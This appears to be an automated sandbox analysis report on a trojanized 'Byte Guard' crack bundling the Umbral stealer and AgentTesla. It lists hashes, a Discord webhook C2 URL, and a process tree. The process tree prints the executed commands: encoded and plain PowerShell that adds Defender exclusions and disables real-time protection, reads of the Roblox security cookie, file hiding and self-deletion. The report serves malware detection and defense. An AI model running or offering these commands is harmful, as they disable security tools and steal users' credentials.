Analysis

  • max time kernel
    141s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    18-08-2024 14:52

General

  • Target

    Byte_Guard_Cracked.exe

  • Size

    4.3MB

  • MD5

    d7936c64138b924d63901cedb2c6cd09

  • SHA1

    b525dd212eac4c808b5166880976b1817caf826b

  • SHA256

    52124dea5ce1c6296873462826b58cf7ced4bc5bff6092af5950769482962339

  • SHA512

    3c2e8b6b1de63baeda4fb714ab3f4104f820cf81d2bbe9d4177631246b7627ac1e76c709a57504ca777dfdbcc74aab95602184a270120f653832f37e4965d3f7

  • SSDEEP

    98304:dnsmtk2a2052wnEFsuU8agxdazsYXhDqgAdXt2:BL4n7uB8zpXcnb2

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1271910498107129856/6QtgJK8NkWoaobhUacej3NEYw3eYaasAKEEehxN04UR57cdaVkLvywYwnoPhZkUSYxdW

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • AgentTesla payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Byte_Guard_Cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\Byte_Guard_Cracked.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Users\Admin\AppData\Local\Umbral.exe
        "C:\Users\Admin\AppData\Local\Umbral.exe"
        3⤵
        • Executes dropped EXE
        PID:2712
      • C:\Users\Admin\AppData\Local\Byte Guard.exe
        "C:\Users\Admin\AppData\Local\Byte Guard.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe
          "C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:2900
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBhACMAPgA="
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:980
        • C:\Users\Admin\AppData\Local\Umbral.exe
          "C:\Users\Admin\AppData\Local\Umbral.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2040
          • C:\Windows\system32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Umbral.exe"
            5⤵
            • Views/modifies file attributes
            PID:1764
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Umbral.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:108
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2668
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            5⤵
              PID:2808
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              5⤵
                PID:2804
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2516
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:2612
              • C:\Windows\system32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Umbral.exe" && pause
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:3040
                • C:\Windows\system32\PING.EXE
                  ping localhost
                  6⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:2936
            • C:\Users\Admin\AppData\Local\Byte Guard.exe
              "C:\Users\Admin\AppData\Local\Byte Guard.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2620
              • C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe
                "C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Enumerates system info in registry
                PID:2360

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\Synaptics\Synaptics.exe

        Filesize

        4.3MB

        MD5

        d7936c64138b924d63901cedb2c6cd09

        SHA1

        b525dd212eac4c808b5166880976b1817caf826b

        SHA256

        52124dea5ce1c6296873462826b58cf7ced4bc5bff6092af5950769482962339

        SHA512

        3c2e8b6b1de63baeda4fb714ab3f4104f820cf81d2bbe9d4177631246b7627ac1e76c709a57504ca777dfdbcc74aab95602184a270120f653832f37e4965d3f7

      • C:\Users\Admin\AppData\Local\Temp\._cache_Byte Guard.exe

        Filesize

        2.5MB

        MD5

        068b2d1729ce3ea43aca321d35983886

        SHA1

        1f0265d64f80734687a5abff64163f735933ba40

        SHA256

        7d356312b37eac1a8c175c3b715b650ef881ba83096d242a87dee1439e14aaa3

        SHA512

        01241980cbf6d6a2f8935790e7d509e487c541590766a290b7dab889bcea6c367170d2d5c56bead75693b78e596af72b00ee22241c2c5b51e8f5384e393af0cd

      • C:\Users\Admin\AppData\Local\Temp\._cache_Byte_Guard_Cracked.exe

        Filesize

        3.6MB

        MD5

        c53c9140b7d6c214c6d168d34365418c

        SHA1

        72144ae7d77432b217f73be33eae773f7cc0dcf7

        SHA256

        8d0405c5776efbedc678af7096a129fea77d1df352a23bf87a9fa3485d2ea143

        SHA512

        f4f912b5784eacfecbf3fcf6876ed573df519070a2d663eb7985a8544a28b03fade339c2eca93b2da7f1240cec60ae1929b81f217c711e575e2d2908ddb80910

      • C:\Users\Admin\AppData\Local\Umbral.exe

        Filesize

        229KB

        MD5

        06b38b4286ab07b09e34030a13893cf8

        SHA1

        1741b0fec5104f2237c84f86e400b34ee457f510

        SHA256

        426f84b164f029d25bd87377d930c1532dd9fb1f490f0ddb2906f2c8006a2f8f

        SHA512

        e752bfa062a46682209dc8d5685b583a523af9a594ed92cb1ce97fda652ded92cffa032b1b69110ca04d7f52a7532aaa3011facfdd90baaeec91515424573df4

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        b59c9b76539b70b090522a05e518145a

        SHA1

        c7461ed830d81a7c2e6935aa727ed711928a510f

        SHA256

        69435fe4c1271bdff297bd8f9b19413d56386cd1bb904a693550495e658b990d

        SHA512

        76e23d4aa496d15dce4321eaf16324fdc3824e40cdbd822cf58e305d57f16a55bc410d4807488991001801f906f0eaa60bcf615763ea7e0824e35fd407818b11

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MA90FBTRURF4QDUPQIR8.temp

        Filesize

        7KB

        MD5

        67a06a44407d06f26a191ecd025ccf1f

        SHA1

        6c4422f80eec7aacb5d6a3deced4033febf94033

        SHA256

        1b249158d63e8efcf38490ab017844ef9bdda8acbbafe029df1e780a3d69f73c

        SHA512

        cda521c30b1572779cbb94c380888f09bcd62ec921776e0f7276b05698cc71bb3e4c9811782fee2faba2281821fef737ab608991761ebe1604574cb7388a0db4

      • \Users\Admin\AppData\Local\Byte Guard.exe

        Filesize

        3.2MB

        MD5

        5d317aa06f8daf4558eb1a48f20a67bd

        SHA1

        e574b2144d7e64ad354074460eb10d6a8d55ef7b

        SHA256

        d76287c021bc3320cd53e42b62a86e3064f56f80158066381d57dfadd64b5a79

        SHA512

        8576d946d69cfbea20b5d4bba7e2620c78017de38cb4fdd6e7d8b768c7e3f21291314aa2b27eb9939c7ddeea08e44e36bb828e53ace370f52ee28ecb6e90ad24

      • memory/324-91-0x000000001B690000-0x000000001B972000-memory.dmp

        Filesize

        2.9MB

      • memory/324-92-0x0000000002790000-0x0000000002798000-memory.dmp

        Filesize

        32KB

      • memory/1012-71-0x0000000000400000-0x0000000000743000-memory.dmp

        Filesize

        3.3MB

      • memory/1536-84-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

        Filesize

        2.9MB

      • memory/1536-85-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

        Filesize

        32KB

      • memory/2360-79-0x0000000006400000-0x0000000006612000-memory.dmp

        Filesize

        2.1MB

      • memory/2516-120-0x0000000001F80000-0x0000000001F88000-memory.dmp

        Filesize

        32KB

      • memory/2620-75-0x0000000000400000-0x0000000000743000-memory.dmp

        Filesize

        3.3MB

      • memory/2652-28-0x0000000000400000-0x0000000000851000-memory.dmp

        Filesize

        4.3MB

      • memory/2652-0-0x0000000000220000-0x0000000000221000-memory.dmp

        Filesize

        4KB

      • memory/2728-76-0x00000000009B0000-0x00000000009F0000-memory.dmp

        Filesize

        256KB

      • memory/2900-77-0x00000000010B0000-0x0000000001338000-memory.dmp

        Filesize

        2.5MB

      • memory/2900-78-0x00000000061F0000-0x000000000644C000-memory.dmp

        Filesize

        2.4MB

      • memory/2920-124-0x0000000000400000-0x0000000000851000-memory.dmp

        Filesize

        4.3MB

      • memory/2920-130-0x0000000000400000-0x0000000000851000-memory.dmp

        Filesize

        4.3MB

      • memory/2920-159-0x0000000000400000-0x0000000000851000-memory.dmp

        Filesize

        4.3MB